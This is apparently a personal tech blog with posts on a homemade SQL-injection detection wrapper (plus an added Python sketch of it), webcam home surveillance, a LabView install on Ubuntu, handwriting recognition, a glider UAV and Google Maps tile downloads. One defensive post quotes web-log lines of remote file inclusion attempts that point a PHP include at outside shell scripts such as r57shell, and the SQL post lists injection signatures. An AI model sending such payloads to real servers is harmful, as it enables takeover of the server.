Preventing SQL injection in unknown source code

March 11th, 2008

Wow, it’s been a while since I’ve written something.

There has been a lot going on lately, the RoboCup 2008 robot competition is coming up soon in a month, I’ve been very busy trying to get the robot to work (pics coming soon)…

Anyway, with all this, I haven’t had a lot of time to work on my other sites, and someone just pointed out recently that there is at least one SQL injection vuln in one of the sites. Since I didn’t code the site, the whole source code is a mess, 40000 lines of PHP code mostly showing how NOT to code. So with my time very limited atm, I decided it was time for one of my little dirty hacks.

The idea was to write a wrapper function for mysql_query() that would be called instead of the real function, and it would check the query for well known and commonly used methods of SQL injection, like the ' OR 43=43, UNION SELECTs, CONCAT, CHAR, --, /**/, # and so on. Most of these could be easily matched with regexes, and the code was ready within half an hour, and it seemed to work very well. The only problem that remained was that it would also match them in strings as well, which resulted in some false positives, especially with characters like # and --. So I decided I’ll write a mini parser that would replace the properly escaped string values in the query with 1 and then do the matching. That got rid of the problem and now it seems to work flawlessly so far.

Right now it’s still in the “logging” mode, where it only logs if an attempt has been detected, but once I’ve monitored it for a few days and made sure it doesn’t interfere with any of the normal queries, I will put it in the “defend” mode that will ban the user if an attempt was detected.

P.S.: Will try to post here more often ;) With the robot competition, I got plenty to talk about :D
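The approach described in this post, sketched as an added example; it is not the author's wrapper, and it is written in Python rather than the site's PHP so the matching logic can be run on its own. The names `mask_string_literals`, `inspect_query` and `guarded_query` are hypothetical, and "defend" mode here simply refuses the query instead of banning the user.

```python
import re

# Signatures for the techniques the post lists. Assumption: the application's
# own queries never use CONCAT(), CHAR() or SQL comments themselves.
SIGNATURES = {
    "tautology": re.compile(r"\bOR\s+(\d+)\s*=\s*\1\b", re.I),    # OR 43=43
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "concat_or_char": re.compile(r"\b(?:CONCAT|CHAR)\s*\(", re.I),
    "comment": re.compile(r"--|/\*|#"),
}

# Constructed examples: an injected lookup and a harmless, escaped title.
SAMPLES = ("SELECT * FROM users WHERE name = 'x' OR 43=43 -- '",
           "SELECT * FROM posts WHERE title = 'Issue #12 -- it\\'s done'")

def mask_string_literals(query):
    """Replace every properly terminated quoted string with the literal 1."""
    out, i, n = [], 0, len(query)
    while i < n:
        quote = query[i]
        if quote not in "'\"":
            out.append(quote)
            i += 1
            continue
        j = i + 1
        while j < n:
            if query[j] == "\\":                      # backslash escape
                j += 2
            elif query[j] == quote and query[j + 1:j + 2] == quote:
                j += 2                                # doubled quote ('')
            elif query[j] == quote:
                break                                 # closing quote
            else:
                j += 1
        if j >= n:                  # unterminated: leave the tail visible
            out.append(query[i:])
            break
        out.append("1")
        i = j + 1
    return "".join(out)

def inspect_query(query):
    """Return the names of all signatures found outside string literals."""
    masked = mask_string_literals(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(masked)]

def guarded_query(execute, query, mode="log", audit=None):
    """Stand-in for the wrapper: record hits, refuse to run in defend mode."""
    hits = inspect_query(query)
    if hits and audit is not None:
        audit.append((hits, query))
    if hits and mode == "defend":
        raise PermissionError("blocked: " + ", ".join(hits))
    return execute(query)
```

A signature filter like this is a stopgap for code that cannot be audited yet; the lasting fix is parameterized queries (for example PDO or mysqli prepared statements) for every statement built from user input.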


Cheap surveillance with open-source software and webcams

September 26th, 2007

After a recent break-in into our house (bunch of stuff stolen, including two laptops :( ), I decided it was time to set up some surveillance system at home. We did not want to hire any companies to set it up for us, since it would’ve been way too expensive and we had bad experiences with these companies.

So I went online looking for a cheap solution, and found an excellent motion detection software called “Motion” (for linux of course). This program is very neat, it has tons of features, supporting multiple input sources including v4l, v4l2, capture cards, etc…

Then I ran into the first computer store on my way, and picked up 3 “Creative Live! Vista” cameras (the cheapest ones) which were 145DKK (27.4USD) each. Hooked it up to the old router (P2 233MHz, 256MB RAM) and tested it. However after a few minutes, it became clear this old P2 won’t be able to handle 4 cameras, so quickly routed all traffic over to the second router with the second internet connection, and replaced the router with a dual Intel P2 400MHz, 380MB RAM box hanging around my room waiting to be thrown out.

2 cameras have been on it for a few days now, and they seem to be working flawlessly. There was a little problem that one of the cameras could see a tree in the garden as well, and it detected motion every time the wind blew, but there is a nice feature called “masking” in Motion, that allows you to load a custom black&white PGM file, where the black areas will not count as motion. This seemed to have fixed the problem, and no false positives happened ever since.

For backup, the pictures and movies of the motions are not only saved on to the local harddrive, but they are also emailed to a remote mail account, in case the router would be taken as well.

I have also added a little alarm feature that plays a music file on the loudest volume on 2 different computers in the house, when motion is detected, which seems to work very well when you’re all alone in the house and want to know when someone comes in.

So far this setup has been working very nicely, the only problem is that these cameras do not work very well in the dark. However recently I learnt how almost all webcams can be modified into infrared cameras. I will be posting a little howto on that later.


How to install LabView 8.2 on Ubuntu

September 3rd, 2007

Today I wanted to install LabView on my laptop, but it turns out they only support RPM based distributions.

However all the packages can be simply converted into .deb with a utility called “alien”, that can be installed easily with apt-get.

# apt-get install alien

# for rpm in *.rpm; do alien -d "$rpm"; done

Then you should have all the debs converted.

# ls *.deb
labview82-appbuild_8.2-2_i386.deb  labview82-rte_8.2-2_i386.deb
labview82-core_8.2-2_i386.deb      labview82-vxi_8.2-2_i386.deb
labview82-desktop_8.2-2_i386.deb   labview-rte-aal_1.1-2_i386.deb
labview82-examples_8.2-2_i386.deb  niexfinder-base_1.0-8_i386.deb
labview82-help_8.2-2_i386.deb      niexfinder-labview82_1.0-8_i386.deb
labview82-pro_8.2-2_i386.deb       niwebpipeline20-dep_2.0-6_i386.deb
labview82-ref_8.2-2_i386.deb

Now they can be installed with dpkg:

# dpkg -i labview*.deb

When that’s done without an error, you’re almost set.

You will also need to install a package called “libosmesa6”, which can also be done from apt-get.

Then:

# cd /usr/local/natinst/LabVIEW-8.2/linux/

# mv libOSMesa.so.4.0 libOSMesa.so.4.0.backup

# ln -s /usr/lib/libOSMesa.so.6 libOSMesa.so.4.0

When that’s done as well, you should be able to start up LabView by typing

# /usr/local/natinst/LabVIEW-8.2/labview

Easy enough eh?


PyKBD 1.0

August 18th, 2007

Today, I’ve decided I will also write an on screen keyboard in Python, that will use the handwriting recognition’s python module for X11. Pretty much like xvkbd.

A very annoying fact in xvkbd that made me do this is the fact that you have to set the focus every time you want to write something, and the flashing windows when the focus changes.

PyKBD creates a gtk window that doesn’t accept focus, so it’s possible to type into any window without the annoying focus flashing :D

Though I’ve only worked on it for an hour or two, I’ve made a little debian/ubuntu .deb package that can be installed and used.

pykbd_1.0-1_i386.deb


Handwriting/Gesture Recognition for Linux

August 3rd, 2007

I just bought a new tablet pc (Acer TravelMate C213). It’s very nice: Intel Core Duo 2 1.66GHz, 1GB DDR2 RAM, 120 GB IDE, NVIDIA GeForce Go 7300 256MB, and all the extras, bluetooth, wifi, fingerprint reader etc… and of course Microsoft XP tablet pc edition 2005… (no comment)

So my first action was to install the newest ubuntu on it (Ubuntu Feisty 7.04), which detected almost all hardware and works perfectly. (The fingerprint reader and the audio needed some work but it works now)

Anyway, I came to find out that there isn’t any decent handwriting recognition software for Linux, either open source or commercial, which is kinda sad. So I began to explore the possibilities in writing one. After seeing how it worked in Windows, I said, how hard can it be?

In about an hour, I managed to hack together a little python application that used a drawing area in pygtk to record the mouse (pen) movements, convert it into a 16×16 matrix, flatten it to a 1D array and store it in a db. Then when the character is entered again, it tries to match the array and outputs the character where the matching percent is the highest.

I also made a little python module (_X11input) in C (swig) that gives low level access to certain X11 functions like XSendKey() and XQueryPointer() etc, which will be needed later on for sending “virtual keypresses” to the right window and dynamically setting the focus on the windows during and after the HWR (handwriting recognition).

To make it more reliable, I’m also looking into a spell checker (aspell) and a python module for it (pyaspell) to take the spelling into consideration when recognising words/letters.

To Do:

- Gnome applet for it

- gtk dockable window (preferably “Always on top”)

- multiple character entry

- character separation in words

- Aspell spell checking

- DB optimization

- X11 focus, sendkey etc (like in xvkbd)

I’ll be posting the sourcecode and screenshots later on ;)

UPDATE: 18-Aug, Here’s a new screenshot:

[Screenshot: Handwriting recognition]


“hacking attempts” on zsuatt.com

July 8th, 2007

While I was browsing my apache web logs, I’ve noticed a few attempts for remote file inclusion:
[root@100mbitserver1 ~]# cat /var/log/httpd/access_log* |grep "p=http://"
82.103.137.106 - - [08/Jul/2007:13:54:18 +0200] "GET /index.php?p=http://kadausa.org/vietnam/cmd.do HTTP/1.0" 200 2032 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)"
140.127.139.248 - - [01/Jul/2007:06:14:09 +0200] "GET /index.php?p=http://www.innovative-ideas.com/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.65"
140.127.139.248 - - [01/Jul/2007:06:14:19 +0200] "GET /index.php?p=http://jnbs.nl/components/com_extcalendar/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.65"
142.166.239.59 - - [04/Jul/2007:08:32:24 +0200] "GET /index.php?p=http://www.google.com HTTP/1.1" 200 2032 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
202.53.232.42 - - [06/Jul/2007:15:14:19 +0200] "GET /index.php?p=http://kadausa.org/vietnam/cmd.do? HTTP/1.1" 200 2032 "-" "Opera/9.02 (Windows NT 5.1; U; en)"
194.105.21.214 - - [24/Jun/2007:07:04:08 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "-"
66.199.227.66 - - [24/Jun/2007:13:08:53 +0200] "GET /index.php?p=http://img376.imageshack.us/img376/7389/cmdscankz7.gif? HTTP/1.1" 200 2032 "-" "libwww-perl/5.803"
216.246.41.206 - - [24/Jun/2007:19:18:52 +0200] "GET /index.php?p=http://img376.imageshack.us/img376/7389/cmdscankz7.gif? HTTP/1.1" 200 2032 "-" "libwww-perl/5.805"
86.127.84.9 - - [26/Jun/2007:19:39:19 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
81.175.110.122 - - [27/Jun/2007:02:57:36 +0200] "GET /index.php?p=http://jnbs.nl/components/com_extcalendar/pr.txt? HTTP/1.1" 200 2032 "-" "libwww-perl/5.805"
91.109.123.211 - - [22/Jun/2007:03:02:47 +0200] "GET /index.php?p=http://soundbazar.free.fr/Up/test.txt HTTP/1.1" 200 2032 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"

Remote file inclusion vulnerabilities are usually exploited by passing a URL that points to malicious code (usually PHP or ASP) to a server, which then fetches and executes it, giving the attacker access to the server. I’ve actually seen Google being used to discover sites with vulnerabilities, for example searching for “index.php?page=*.html”.

So I started to dig around, checked out those websites, most of them are either hacked or some free upload sites. Interestingly enough, I managed to get hold of (in #remote-exploit on FreeNode) one of the users/owners of no.spam.ee, tonu, who seemed to be very ignorant about it, saying that he does not care what others use his publicly put online php shells for.

<attila> where have i seen that hostname
<attila> now i remember
<attila> in my apache logs
<attila> # cat /var/log/httpd/access_log* |grep no.spam.ee
<attila> 194.105.21.214 - - [24/Jun/2007:07:04:08 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "-"
<attila> 86.127.84.9 - - [26/Jun/2007:19:39:19 +0200] "GET /index.php?p=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.0" 200 2032 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
<attila> heh
<tonu> some suckers try to use this phpshell
<tonu> anyway it is not me who is hacking
<attila> take it offline then
<attila> it will always get abused
<tonu> why?
<tonu> if I put format.exe on the web and it gets abused?
<tonu> so where is my fault?
<tonu> someone formats your disk and I get sued?

Oh well, I’m not the one who will get into trouble if his server is used to hack into somewhere and cause major financial losses.

I also suggested to him to put a die() in the code, so it couldn’t be used for remote file inclusion, but it seems like he just doesn’t care.


Glider Status Update

July 8th, 2007

While most of the hardware is ready for use, I’m still struggling with the walkie talkie communication. As I mentioned before, it will be used as a “sound modem” (much like the good old 56k modems) to communicate serially. I’ve been reading up on it a lot, and found a modulation technique that wouldn’t be so hard to implement but it would still perform okish. FSK (Frequency Shift Keying) works in a way that Mark (binary 1) and Space (binary 0) have different frequencies, in my case 1200Hz and 2200Hz, since it’s in the range of the 8kHz sampling rate. At this rate, I’m hoping to achieve around 1200bps, which would be sufficient for remote controlling and data logging.

I’ve also bought a CCD “pinhole” camera which will supply live video from the glider. The resolution is normal NTSC (648 x 486) which should be good enough for now. A 2.4GHz transmitter/receiver is still missing, since I couldn’t order it from UK.


Google maps

June 25th, 2007

After seeing google’s new (back then) maps.google.com, I thought how cool would it be to make a huge map of Copenhagen that could be used for a number of things, from making huge posters out of it to using it for a navigation software with GPS.

maps.google.com uses javascript to load a bunch of GIF images with the resolution of 256×256. These can be manually downloaded by looking at their urls. Sending a GET request to google with the appropriate X and Y coordinates and zoom value, it is possible to download a range of images with a simple script. After these have been downloaded, I made a php script that put all the images together into one huge gif with the resolution of 48896×60672 (15MB) http://attila.zsuatt.com/googlemaps/copenhagen.gif

After I’ve seen the success of the Copenhagen map, I have begun to make a Denmark map. Over 300000 pictures have been downloaded (with a multithreaded, load balancing script), which are over 1.4GB together, with the resolution of 155136×128768. The current problem is with putting so many pictures together. I would need to allocate over 3GB of RAM, which I don’t have at the moment :( So I might have to find another way to do it.


New UAV project

June 21st, 2007

One of the cool projects (as promised) to start this blog up will be a UAV (Unmanned Aerial Vehicle).

Intro:

The plan is to build a UAV Glider that would be able to autopilot itself, communicate with the ground at long (few km) distances, and send back live or snapshot pictures. The project is not only interesting from the building perspective, but also the number of possibilities it offers for further work. The uses of aerial images are infinite, from traffic monitoring, search and rescue to real estate photography. I will be able to get into these fields hopefully once the glider is fully functional.

Materials:

I’ve decided not to go for a too expensive solution for now, as I haven’t really had any experience with flight control or even flying RC planes, so while I’m really hoping there won’t be any crashes, I still wouldn’t want to trash thousands of dollars of equipment.

  • Multiplex Easy Glider Electric (bought): A review of it can be seen on rcgroups (http://www.rcgroups.com/forums/showthread.php?t=373015), a community I’ve recently become a member of. Based on the reviews I’ve read about this plane, it is one of the most “crash resistant” and easily flyable model gliders on the market, which makes it ideal for my purposes.
  • Gumstix Basix 200 (bought): This will be the computer handling everything on the plane, from navigation, communication, stabilization, to power management. It has an Intel XScale 200MHz ARM cpu that can be found in PocketPCs, 64MB ram and 8MB flash. The flash contains a fully bootable linux distribution.
  • GPStix (bought): It is an extension board for gumstix, that contains a gps module, audio hardware, 4 serial ports, GPIO pins, I2C bus etc. Most of these are already implemented on the Basix board, but they are not accessible easily due to the 60pin connector on it. The GPS is hardwired to one of the serial ports. I haven’t managed to test it yet as I do not currently own an active or a passive GPS antenna.
  • Gyro Breakout Board - Dual Axis IDG300 (shipping from germany): A 2-axis gyro, it will be responsible for the stabilization of the plane.
  • Triple Axis Accelerometer Breakout - LIS3LV02DQ (shipping from germany): 3-axis accelerometer, with this, it should be possible to figure out the wind speed and direction, as well as the plane speed.
  • Motorola Walkie Talkies (bought): These walkie talkies will be used as a “sound modem” for the primary communication with the plane. They work on 446MHz, and over a long (up to 5km) range. Their measured (by me) power consumption is 26mA when IDLE and 142mA on transmission, which makes it suitable for a low power project like this. The expected communication rate is hopefully between 1200 and 9600bps, which is not a lot, but it should be enough for remote control and status reporting (gps, altitude, speed, computer status, temperature etc)
  • Cameras (planning): Cameras are still undecided. The first idea was to have usb webcams, but since the gumstix doesn’t support USB host, that idea is out. Also the transmission rate of the walkie talkie would not be fast enough to send pictures over it… Currently I’m thinking about using 2.4GHz wireless cameras…

So far not much work has been done on the project, the connectors for ttyS0 and the power to the gumstix board have been soldered, and it has booted up fine. The next thing will be to hack up a little connector for one of the plane servos and test if it’s possible to signal them over the GPIO lines.


Welcome everyone!

June 21st, 2007

Hello there!

For a while now, I have been thinking about making a site to talk about my projects, however I never really had time to do anything about it. So then I decided, hey why not set up a blog for it?

And here it is…

In this blog, I’m hoping to let people enjoy the wonderful experience of exploring different areas of computer science, which will hopefully include, but not be limited to, computer security, clustering, robotics, artificial intelligence, general programming and cool projects.
